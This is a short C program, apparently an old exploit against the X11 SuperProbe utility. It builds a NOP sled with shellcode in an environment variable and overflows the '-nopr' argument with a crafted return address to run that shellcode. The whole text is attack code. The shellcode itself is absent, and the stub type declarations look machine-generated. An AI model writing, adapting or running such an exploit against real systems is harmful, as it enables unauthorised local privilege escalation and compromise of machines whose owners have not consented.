
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 char* alignment ;
 scalar_t__* buffer ;
 int bufsize ;
 int execl (char*,char*,char*,scalar_t__*,int *) ;
 char* get_sp () ;
 int memset (scalar_t__*,char,int) ;
 int setenv (char*,scalar_t__*,int) ;
 int shellcode ;
 int strcpy (scalar_t__*,int ) ;

main() {
int i;
for (i = 0; i < bufsize / 2; i += 4)
*(char **)&buffer[i] = get_sp() - 2048;
memset(&buffer[bufsize / 2], 0x90, bufsize / 2);
strcpy(&buffer[bufsize - 256], shellcode);
setenv("SHELLCODE", buffer, 1);
memset(buffer, 'x', 72);
*(char **)&buffer[72] = get_sp() - 6144 - alignment;
buffer[76] = 0;
execl("/usr/X11/bin/SuperProbe", "SuperProbe", "-nopr", buffer, ((void*)0));
}
